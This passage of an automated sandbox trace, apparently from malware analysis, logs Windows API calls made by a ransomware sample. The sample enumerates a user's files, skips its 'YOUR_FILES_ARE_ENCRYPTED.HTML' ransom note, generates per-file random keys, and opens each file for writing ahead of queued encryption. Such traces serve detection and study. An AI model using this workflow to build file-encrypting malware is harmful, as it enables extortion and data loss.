(lpString1="NdW9Nqmyx.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.659] PathFindExtensionW (pszPath="NdW9Nqmyx.bmp") returned=".bmp" [0165.659] lstrlenW (lpString=".bmp") returned 4 [0165.659] PathFindExtensionW (pszPath="NdW9Nqmyx.bmp") returned=".bmp" [0165.659] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cb2c3c0, ftCreationTime.dwHighDateTime=0x1d7d71e, ftLastAccessTime.dwLowDateTime=0xfeefce20, ftLastAccessTime.dwHighDateTime=0x1d7db59, ftLastWriteTime.dwLowDateTime=0xfeefce20, ftLastWriteTime.dwHighDateTime=0x1d7db59, nFileSizeHigh=0x0, nFileSizeLow=0x13fc6, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Nt0kouwsI.jpg", cAlternateFileName="NT0KOU~1.JPG")) returned 1 [0165.659] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg") returned 53 [0165.659] lstrcmpW (lpString1="Nt0kouwsI.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.659] PathFindExtensionW (pszPath="Nt0kouwsI.jpg") returned=".jpg" [0165.659] lstrlenW (lpString=".jpg") returned 4 [0165.660] PathFindExtensionW (pszPath="Nt0kouwsI.jpg") returned=".jpg" [0165.660] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\nt0kouwsi.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.660] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=81862) returned 1 [0165.660] GetProcessHeap () returned 0x270000 [0165.660] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.664] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="1C") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="52") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="3A") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="7B") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AF") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D4") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="09") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="88") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E6") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="96") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7F") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D3") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="84") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="17") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="BA") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4C") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D8") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="37") returned 2 [0165.664] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F4") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="95") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="28") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8E") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="0E") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="98") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="19") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A2") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BA") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="7D") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="33") returned 2 [0165.665] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2A") returned 2 [0165.665] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg" [0165.665] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.666] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.666] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87308f80, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0x920ec090, ftLastAccessTime.dwHighDateTime=0x1d7df5a, ftLastWriteTime.dwLowDateTime=0x920ec090, ftLastWriteTime.dwHighDateTime=0x1d7df5a, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Oz2eLzn.mp3", cAlternateFileName="")) returned 1 [0165.666] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3") returned 51 [0165.666] lstrcmpW (lpString1="Oz2eLzn.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.666] PathFindExtensionW (pszPath="Oz2eLzn.mp3") returned=".mp3" [0165.666] lstrlenW (lpString=".mp3") returned 4 [0165.666] PathFindExtensionW (pszPath="Oz2eLzn.mp3") returned=".mp3" [0165.666] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\oz2elzn.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.666] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=85600) returned 1 [0165.666] GetProcessHeap () returned 0x270000 [0165.666] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.670] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="87") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="DB") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="42") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="88") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DA") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="30") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8E") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="8F") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="15") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="B3") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A0") returned 2 [0165.670] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D7") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0C") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="35") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="AB") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="71") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5D") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9C") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="71") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A2") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1D") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="AA") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="EF") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F9") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="FD") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="07") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="87") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="43") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="74") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="66") returned 2 [0165.671] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6C") returned 2 [0165.672] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Oz2eLzn.mp3" [0165.672] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.672] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.677] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88b83c80, ftCreationTime.dwHighDateTime=0x1d7da85, ftLastAccessTime.dwLowDateTime=0x5c1a7d40, ftLastAccessTime.dwHighDateTime=0x1d7dab3, ftLastWriteTime.dwLowDateTime=0x5c1a7d40, ftLastWriteTime.dwHighDateTime=0x1d7dab3, nFileSizeHigh=0x0, nFileSizeLow=0xc1b1, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="qoQusl.m4a", cAlternateFileName="")) returned 1 [0165.682] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a") returned 50 [0165.682] lstrcmpW (lpString1="qoQusl.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.682] PathFindExtensionW (pszPath="qoQusl.m4a") returned=".m4a" [0165.682] lstrlenW (lpString=".m4a") returned 4 [0165.682] PathFindExtensionW (pszPath="qoQusl.m4a") returned=".m4a" [0165.682] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\qoqusl.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.682] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=49585) returned 1 [0165.682] GetProcessHeap () returned 0x270000 [0165.682] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.683] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="13") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D7") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="72") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="7B") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="D4") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="96") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="1A") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CF") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="26") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="BC") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C6") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3E") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="1A") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9A") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="27") returned 2 [0165.683] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F4") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="16") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="F5") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5D") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C5") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="EE") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="32") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="7E") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="3D") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="06") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="81") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E9") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="4A") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="82") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="97") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="35") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="38") returned 2 [0165.685] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a" [0165.685] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.685] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.697] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd44feb60, ftCreationTime.dwHighDateTime=0x1d7d9be, ftLastAccessTime.dwLowDateTime=0x6bf91bf0, ftLastAccessTime.dwHighDateTime=0x1d7dac1, ftLastWriteTime.dwLowDateTime=0x6bf91bf0, ftLastWriteTime.dwHighDateTime=0x1d7dac1, nFileSizeHigh=0x0, nFileSizeLow=0x979a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="QSp2x.ods", cAlternateFileName="")) returned 1 [0165.697] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods") returned 49 [0165.697] lstrcmpW (lpString1="QSp2x.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.697] PathFindExtensionW (pszPath="QSp2x.ods") returned=".ods" [0165.697] lstrlenW (lpString=".ods") returned 4 [0165.697] PathFindExtensionW (pszPath="QSp2x.ods") returned=".ods" [0165.697] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\qsp2x.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.698] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=38810) returned 1 [0165.698] GetProcessHeap () returned 0x270000 [0165.698] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.699] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="07") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="4E") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="09") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C1") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="A7") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="7E") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="31") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B3") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="02") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DE") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="15") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="E4") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="DE") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="19") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="2F") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C0") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="85") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="64") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B4") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AF") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="FC") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="9B") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="60") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="35") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="47") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9B") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="62") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="74") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="48") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="5B") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="BC") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1F") returned 2 [0165.700] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods" [0165.700] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.700] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.705] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36a525f0, ftCreationTime.dwHighDateTime=0x1d7db6d, ftLastAccessTime.dwLowDateTime=0x9f4aaff0, ftLastAccessTime.dwHighDateTime=0x1d7ddff, ftLastWriteTime.dwLowDateTime=0x9f4aaff0, ftLastWriteTime.dwHighDateTime=0x1d7ddff, nFileSizeHigh=0x0, nFileSizeLow=0x63f7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RBbwYGkm_WNBvZLE_av.png", cAlternateFileName="RBBWYG~1.PNG")) returned 1 [0165.708] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png") returned 63 [0165.708] lstrcmpW (lpString1="RBbwYGkm_WNBvZLE_av.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.708] PathFindExtensionW (pszPath="RBbwYGkm_WNBvZLE_av.png") returned=".png" [0165.708] lstrlenW (lpString=".png") returned 4 [0165.708] PathFindExtensionW (pszPath="RBbwYGkm_WNBvZLE_av.png") returned=".png" [0165.708] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\rbbwygkm_wnbvzle_av.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.709] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=25591) returned 1 [0165.709] GetProcessHeap () returned 0x270000 [0165.709] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.709] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6E") returned 2 [0165.709] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="39") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="80") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6B") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="12") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DF") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="61") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="A0") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0D") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A3") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="5C") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AF") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="2E") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="3A") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3E") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2C") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="06") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E4") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="93") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F3") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="58") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="73") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A6") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="03") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="5B") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="58") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="F0") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="BC") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="56") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="33") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B5") returned 2 [0165.710] wsprintfW (in: 